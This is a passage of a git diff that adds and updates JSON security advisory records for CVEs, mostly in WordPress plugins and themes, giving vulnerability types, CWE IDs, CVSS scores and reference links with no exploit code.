issue affects Bold Page Builder: from n/a through <= 5.6.4.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:24Z" diff --git a/advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json b/advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json new file mode 100644 index 0000000000000..6bf8778540ce5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gv3f-578r-jhf3", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67990" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 GMap Targeting gmap-targeting allows Reflected XSS.This issue affects GMap Targeting: from n/a through <= 1.1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67990" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/gmap-targeting/vulnerability/wordpress-gmap-targeting-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gv8w-m9x9-cvqj/GHSA-gv8w-m9x9-cvqj.json b/advisories/unreviewed/2026/02/GHSA-gv8w-m9x9-cvqj/GHSA-gv8w-m9x9-cvqj.json new file mode 100644 index 0000000000000..80e65b36ba9e5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gv8w-m9x9-cvqj/GHSA-gv8w-m9x9-cvqj.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gv8w-m9x9-cvqj", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-2851" + ], + "details": "A vulnerability was determined in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. This vulnerability affects the function addInport/updateInport/deleteInport of the file dataset\\repos\\warehouse\\src\\main\\java\\com\\yeqifu\\bus\\controller\\InportController.java of the component Inport Endpoint. Executing a manipulation can lead to improper access controls. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2851" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse/issues/62" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse/issues/62#issue-3846670634" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347087" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347087" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754430" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T18:25:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gvgc-7vpx-c4jp/GHSA-gvgc-7vpx-c4jp.json b/advisories/unreviewed/2026/02/GHSA-gvgc-7vpx-c4jp/GHSA-gvgc-7vpx-c4jp.json new file mode 100644 index 0000000000000..e95d8dd187f0f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gvgc-7vpx-c4jp/GHSA-gvgc-7vpx-c4jp.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gvgc-7vpx-c4jp", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-67547" + ], + "details": "Missing Authorization vulnerability in uixthemes Konte konte allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Konte: from n/a through <= 2.4.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67547" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/konte/vulnerability/wordpress-konte-theme-2-4-6-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gxg3-7vjc-h392/GHSA-gxg3-7vjc-h392.json b/advisories/unreviewed/2026/02/GHSA-gxg3-7vjc-h392/GHSA-gxg3-7vjc-h392.json new file mode 100644 index 0000000000000..910304f6a217e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gxg3-7vjc-h392/GHSA-gxg3-7vjc-h392.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gxg3-7vjc-h392", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69309" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Saasplate Core saasplate-core allows Blind SQL Injection.This issue affects Saasplate Core: from n/a through <= 1.2.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69309" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/saasplate-core/vulnerability/wordpress-saasplate-core-plugin-1-2-8-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h886-6wvm-63qx/GHSA-h886-6wvm-63qx.json b/advisories/unreviewed/2026/02/GHSA-h886-6wvm-63qx/GHSA-h886-6wvm-63qx.json new file mode 100644 index 0000000000000..a72d2f4ef0574 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h886-6wvm-63qx/GHSA-h886-6wvm-63qx.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h886-6wvm-63qx", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67998" + ], + "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in kamleshyadav Miraculous Elementor miraculous-el allows Authentication Abuse.This issue affects Miraculous Elementor: from n/a through <= 2.0.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67998" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/miraculous-el/vulnerability/wordpress-miraculous-elementor-plugin-2-0-7-broken-authentication-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-288" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h8g5-mfv5-4rp9/GHSA-h8g5-mfv5-4rp9.json b/advisories/unreviewed/2026/02/GHSA-h8g5-mfv5-4rp9/GHSA-h8g5-mfv5-4rp9.json new file mode 100644 index 0000000000000..b3b834bd5c8f4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h8g5-mfv5-4rp9/GHSA-h8g5-mfv5-4rp9.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h8g5-mfv5-4rp9", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68542" + ], + "details": "Missing Authorization vulnerability in vgdevsolutions Checkout Gateway for IRIS checkout-gateway-iris allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Checkout Gateway for IRIS: from n/a through <= 1.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68542" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/checkout-gateway-iris/vulnerability/wordpress-checkout-gateway-for-iris-plugin-1-3-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json b/advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json new file mode 100644 index 0000000000000..43499f385ad23 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h8h3-mqvc-hwrf", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22368" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Redy redy allows PHP Local File Inclusion.This issue affects Redy: from n/a through <= 1.0.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22368" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/redy/vulnerability/wordpress-redy-theme-1-0-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json b/advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json new file mode 100644 index 0000000000000..bfd7ac10f2ae4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h93r-xq5m-hv3w", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26725" + ], + "details": "An issue in edu Business Solutions Print Shop Pro WebDesk v.18.34 allows a remote attacker to escalate privileges via the AccessID parameter.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26725" + }, + { + "type": "WEB", + "url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2026-26725" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h94h-v9gq-74g7/GHSA-h94h-v9gq-74g7.json b/advisories/unreviewed/2026/02/GHSA-h94h-v9gq-74g7/GHSA-h94h-v9gq-74g7.json new file mode 100644 index 0000000000000..a7cc69271c1a5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h94h-v9gq-74g7/GHSA-h94h-v9gq-74g7.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h94h-v9gq-74g7", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67624" + ], + "details": "Missing Authorization vulnerability in Arya Dhiratara Optimize More! – Images optimize-more-images allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Optimize More! – Images: from n/a through <= 1.1.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67624" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/optimize-more-images/vulnerability/wordpress-optimize-more-images-plugin-1-1-3-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json b/advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json new file mode 100644 index 0000000000000..a2aaea7acfba6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hc23-qvrh-v59g", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22370" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Marveland marveland allows PHP Local File Inclusion.This issue affects Marveland: from n/a through <= 1.3.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22370" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/marveland/vulnerability/wordpress-marveland-theme-1-3-0-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json b/advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json new file mode 100644 index 0000000000000..59f259e688502 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hc97-m5vw-hgpf", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69385" + ], + "details": "Missing Authorization vulnerability in AgniHD Cartify - WooCommerce Gutenberg WordPress Theme cartify allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cartify - WooCommerce Gutenberg WordPress Theme: from n/a through <= 1.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69385" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/cartify/vulnerability/wordpress-cartify-woocommerce-gutenberg-wordpress-theme-theme-1-3-arbitrary-content-deletion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hrxh-f933-qcp6/GHSA-hrxh-f933-qcp6.json b/advisories/unreviewed/2026/02/GHSA-hrxh-f933-qcp6/GHSA-hrxh-f933-qcp6.json index 378b2abd4a0a8..843e981ea922a 100644 --- a/advisories/unreviewed/2026/02/GHSA-hrxh-f933-qcp6/GHSA-hrxh-f933-qcp6.json +++ b/advisories/unreviewed/2026/02/GHSA-hrxh-f933-qcp6/GHSA-hrxh-f933-qcp6.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-hrxh-f933-qcp6", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25313" ], "details": "Missing Authorization vulnerability in Shahjahan Jewel FluentForm fluentform allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FluentForm: from n/a through <= 6.1.14.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:15Z" diff --git a/advisories/unreviewed/2026/02/GHSA-hx9h-rh37-jg32/GHSA-hx9h-rh37-jg32.json b/advisories/unreviewed/2026/02/GHSA-hx9h-rh37-jg32/GHSA-hx9h-rh37-jg32.json new file mode 100644 index 0000000000000..ecd4ce1176614 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hx9h-rh37-jg32/GHSA-hx9h-rh37-jg32.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hx9h-rh37-jg32", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22379" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Netmix netmix allows PHP Local File Inclusion.This issue affects Netmix: from n/a through <= 1.0.10.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22379" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/netmix/vulnerability/wordpress-netmix-theme-1-0-10-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j368-q2mr-vhv4/GHSA-j368-q2mr-vhv4.json b/advisories/unreviewed/2026/02/GHSA-j368-q2mr-vhv4/GHSA-j368-q2mr-vhv4.json new file mode 100644 index 0000000000000..000dd5416e274 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j368-q2mr-vhv4/GHSA-j368-q2mr-vhv4.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j368-q2mr-vhv4", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22341" + ], + "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Case-Themes Booked booked allows Authentication Abuse.This issue affects Booked: from n/a through <= 3.0.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22341" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/booked/vulnerability/wordpress-booked-plugin-3-0-0-account-takeover-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-288" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j3pj-q5qg-g2r8/GHSA-j3pj-q5qg-g2r8.json b/advisories/unreviewed/2026/02/GHSA-j3pj-q5qg-g2r8/GHSA-j3pj-q5qg-g2r8.json new file mode 100644 index 0000000000000..7f7b10314377f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j3pj-q5qg-g2r8/GHSA-j3pj-q5qg-g2r8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j3pj-q5qg-g2r8", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22381" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes PawFriends - Pet Shop and Veterinary WordPress Theme pawfriends allows PHP Local File Inclusion.This issue affects PawFriends - Pet Shop and Veterinary WordPress Theme: from n/a through <= 1.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22381" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/pawfriends/vulnerability/wordpress-pawfriends-pet-shop-and-veterinary-wordpress-theme-theme-1-3-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j4g8-p5xf-cx8j/GHSA-j4g8-p5xf-cx8j.json b/advisories/unreviewed/2026/02/GHSA-j4g8-p5xf-cx8j/GHSA-j4g8-p5xf-cx8j.json new file mode 100644 index 0000000000000..d537fa7736161 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j4g8-p5xf-cx8j/GHSA-j4g8-p5xf-cx8j.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j4g8-p5xf-cx8j", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67970" + ], + "details": "Missing Authorization vulnerability in vertim Schedula schedula-smart-appointment-booking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Schedula: from n/a through <= 1.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67970" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/schedula-smart-appointment-booking/vulnerability/wordpress-schedula-plugin-1-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json b/advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json new file mode 100644 index 0000000000000..05508e3ee2c20 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j69g-gh5p-j2j3", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67978" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FixBD Educare educare allows Reflected XSS.This issue affects Educare: from n/a through <= 1.6.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67978" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/educare/vulnerability/wordpress-educare-plugin-1-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jcgh-3xqc-4hgp/GHSA-jcgh-3xqc-4hgp.json b/advisories/unreviewed/2026/02/GHSA-jcgh-3xqc-4hgp/GHSA-jcgh-3xqc-4hgp.json new file mode 100644 index 0000000000000..27e1cd390761e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jcgh-3xqc-4hgp/GHSA-jcgh-3xqc-4hgp.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jcgh-3xqc-4hgp", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2024-50555" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Elementor Elementor Website Builder elementor allows Stored XSS.This issue affects Elementor Website Builder: from n/a through <= 3.29.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50555" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/elementor/vulnerability/wordpress-elementor-website-builder-plugin-3-29-0-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jf9p-r93v-rw24/GHSA-jf9p-r93v-rw24.json b/advisories/unreviewed/2026/02/GHSA-jf9p-r93v-rw24/GHSA-jf9p-r93v-rw24.json new file mode 100644 index 0000000000000..fecc480f431b2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jf9p-r93v-rw24/GHSA-jf9p-r93v-rw24.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jf9p-r93v-rw24", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68534" + ], + "details": "Missing Authorization vulnerability in add-ons.org PDF for WPForms pdf-for-wpforms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PDF for WPForms: from n/a through <= 6.3.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68534" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/pdf-for-wpforms/vulnerability/wordpress-pdf-for-wpforms-plugin-6-3-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jhr5-g8vv-6x3q/GHSA-jhr5-g8vv-6x3q.json b/advisories/unreviewed/2026/02/GHSA-jhr5-g8vv-6x3q/GHSA-jhr5-g8vv-6x3q.json new file mode 100644 index 0000000000000..7fec7a156abfc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jhr5-g8vv-6x3q/GHSA-jhr5-g8vv-6x3q.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jhr5-g8vv-6x3q", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67973" + ], + "details": "Missing Authorization vulnerability in sunshinephotocart Sunshine Photo Cart sunshine-photo-cart allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sunshine Photo Cart: from n/a through <= 3.5.6.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67973" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/sunshine-photo-cart/vulnerability/wordpress-sunshine-photo-cart-plugin-3-5-6-2-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jjpv-2mhh-mcmm/GHSA-jjpv-2mhh-mcmm.json b/advisories/unreviewed/2026/02/GHSA-jjpv-2mhh-mcmm/GHSA-jjpv-2mhh-mcmm.json new file mode 100644 index 0000000000000..c0ef1a9fa90c3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jjpv-2mhh-mcmm/GHSA-jjpv-2mhh-mcmm.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jjpv-2mhh-mcmm", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67995" + ], + "details": 